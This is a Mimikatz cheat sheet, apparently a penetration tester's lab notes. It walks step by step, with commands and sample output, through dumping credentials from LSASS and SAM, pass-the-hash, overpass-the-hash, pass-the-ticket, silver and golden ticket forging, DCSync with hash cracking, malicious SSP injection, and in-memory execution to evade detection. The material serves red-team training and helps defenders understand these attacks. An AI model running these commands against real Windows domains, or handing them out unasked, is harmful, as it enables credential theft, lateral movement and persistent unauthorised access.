Mimikatz

mimikatz is a powerful post-exploitation tool used to extract plaintext passwords, hashes, PINs, and Kerberos tickets from memory on Windows systems. It is commonly used by penetration testers and attackers to escalate privileges and move laterally within networks. It has a binary as well as a .ps1 implementation.

Modules

LSADump

The lsadump module dumps credentials from the Local Security Authority (LSA) framework. Most of these commands require either debug rights (privlege::debug) or local System (token::elevate). By default, the Administrators group has the SeDebugPrivilege.

Command	Description
lsadump::lsa	Extracts LSA secrets from the SECURITY hive or memory
lsadump::sam	Dumps local account hashes from the SAM hive
lsadump::secrets	Parses the decrypted LSA secrets
lsadump::cache	Gets MSCache (cached domain logons)
lsadump::dcsync	Simulates a DC and pulls secrets over LDAP

SekurLSA

The sekurlsa module is used to extract credentials from the protected Local Security Authority Subsystem Service (LSASS) memory. Similarly to the lsadump module, it requires either debug rights (privlege::debug) or local System (token::elevate).

# Enable the SeDebugPrivilege
privilege::debug

# Escalate privileges to SYSTEM
token::elevate

Command	Description
sekurlsa::logonpasswords	Extracts all available credentials from LSASS: NTLM hashes, plaintext passwords (if available), Kerberos tickets, etc.
sekurlsa::tickets	Dumps all tickets in all sessions from LSASS
sekurlsa::kerberos	Extracts Kerberos tickets (TGTs, TGs) for current user from LSASS
sekurlsa::ekeys	Extracts Kerberos encryption keys (aes256, rc4)
sekurlsa::wdigest	Retrieves plaintext passwords if WDigest is enabled
sekurlsa::ssp	Extracts credentials used by Security Support Provider packages
sekurlsa::livessp	Targets LiveSSP credentials (rare)
sekurlsa::tspkg	Dumps credentials from the Terminal Services package
sekurlsa::msv	Dumps credentials from the MSV1_0 package (local logons and NTLM hashes)

Lateral Movement

Pass-the-Hash

For more info about this attack, see here.

1. SeDebugPrivilege

mimikatz # privilege::debug
Privilege '20' OK

2. LSASS

Domain hashes are stored in memory of the LSASS process.

mimikatz # sekurlsa::logonpasswords
<SNIP>

Authentication Id : 0 ; 5468350 (00000000:005370be)
Session           : RemoteInteractive from 5
User Name         : Administrator
Domain            : CORP
Logon Server      : SERVERWK248
Logon Time        : 9/19/2024 2:08:28 AM
SID               : S-1-5-21-1711441587-1152167230-1972296030-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CORP
         * NTLM     : 160c0b16dd0ee77e7c494e38252f7ddf
<SNIP>

3. PtH

With the Domain Administrator's hash, we can perform the PtH attack.

$ impacket-wmiexec -debug -hashes :160c0b16dd0ee77e7c494e38252f7ddf CORP/Administrator@192.168.50.248
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 192.168.50.248 and isFQDN is False
[+] StringBinding: SERVERWK248[64285]
[+] StringBinding: 192.168.50.248[64285]
[+] StringBinding chosen: ncacn_ip_tcp:192.168.50.248[64285]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

Overpass-the-Hash

For more info about this attack, see here.

1. Obtain NTLM

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
...
NTLM : 369def79d8372408bf6e93364cc93075
...

2. PtH

Launch a session in the Kerberos ticket context of the target user.

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

3. Auth

Use a Kerberos-authenticated service, e.g. CIFS, to convert the NTML to a TGT.

# List cached tickets
> klist
...
Cached Tickets: (0)

# Kerberos-based authentication service
> net use \\files04
The command completed successfully.

# List cached tickets
> klist
...
Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com

4. Exploit

Use any Kerberbos-based authentication utility directly, such as PsExec.

.\PsExec.exe \\files04 cmd
...
C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>hostname
FILES04

Pass-the-Ticket

For more info about this attack, see here.

1. Export Tickets

privilege::debug
sekurlsa::tickets /export
...
Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

2. Inject Ticket

Find the relevant ticket.

> dir *.kirbi
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
...

Inject it into the current session.

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

3. Exploit

> klist
...
Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
        
> ls \\web04\backup
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Silver Ticket

For more info about this attack, see here.

1. Extract NTML

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

User Name : iis_service
NTLM      : 4d28cf5252d39971419580a51484ca09
SID       : S-1-5-21-1987370270-658905905-1781884369-1109

2. Forge ST

mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
Golden ticket for 'jeffadmin @ corp.com' successfully submitted for current session

3. Exploit

# List cached tickets
> klist
Client: jeffadmin @ corp.com
Server: http/web04.corp.com @ corp.com
Ticket Flags: forwardable renewable pre_authent

# Exploit
> iwr -UseDefaultCredentials http://web04
StatusCode        : 200
StatusDescription : OK
...

DCSync

For more info about this attack, see here.

1. Extract NTML

mimikatz # lsadump::dcsync /user:corp\dave
...
SAM Username         : dave
NTLM Hash            : 08d7a47a6f9f66b97b1bae4178747494
LM Hash              : 45bc7d437911303a42e764eaf8fda43e
...

2. Crack NTML

$ hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
08d7a47a6f9f66b97b1bae4178747494:Flowers1

3. DCSync

mimikatz # lsadump::dcsync /user:corp\Administrator
...
NTLM Hash: 2892d26cdf84d7a70e2eb3b9f05c425e

SSP Injection

For more info about this attack, see here.

1. Inject malicious SSP into LSASS

mimikatz # misc::memssp
Injected =)

2. Intercept Creds

> type C:\Windows\System32\mimilsa.log
<SNIP>
[00000000:0066608e] CORP\Administrator  QWERTY123!@#
<SNIP>

Persistence

Golden Ticket

For more info about this attack, see here.

1. Extract NTML

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
...
User : krbtgt
NTLM : 1693c6cefafffc7af11ef34d1c788f47

2. Create the GT

Delete existing Kerberos tickets.

mimikatz # kerberos::purge

Create the GT.

mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
...
Golden ticket for 'jen @ corp.com' successfully submitted for current session

3. Exploit

Launch a new session using the current security context.

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

Exploit.

# Use hostname, not IP address as the latter forces NTML auth
> PsExec.exe \\dc1 cmd.exe

Mimikatz via WinRM

When using mimikatz via a WinRM session it won't run as expected because it’s launched in a non-interactive session. This prevents it from creating or accessing a console. This results in repeated prompts and no actual output. The solution to this issue is to run it with a non-interactive command:

*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

SafetyKatz

To evade detection, tools like Mimikatz are often executed in-memory using .NET-based PE loaders such as PELoader. For example, sekurlsa::ekeys or sekurlsa::logonpasswords can be run directly from memory without writing the Mimikatz binary to disk.

SafetyKatz integrates this approach, combining a modified Mimikatz with an embedded loader. It first generates a minidump of LSASS via the MiniDumpWriteDump API (typically to C:\Windows\Temp\debug.bin), then loads the dump and parses credentials in-memory before cleaning up artifacts.

Resources

• The Unofficial Guide to Mimikatz & Command Reference by AD Security (article)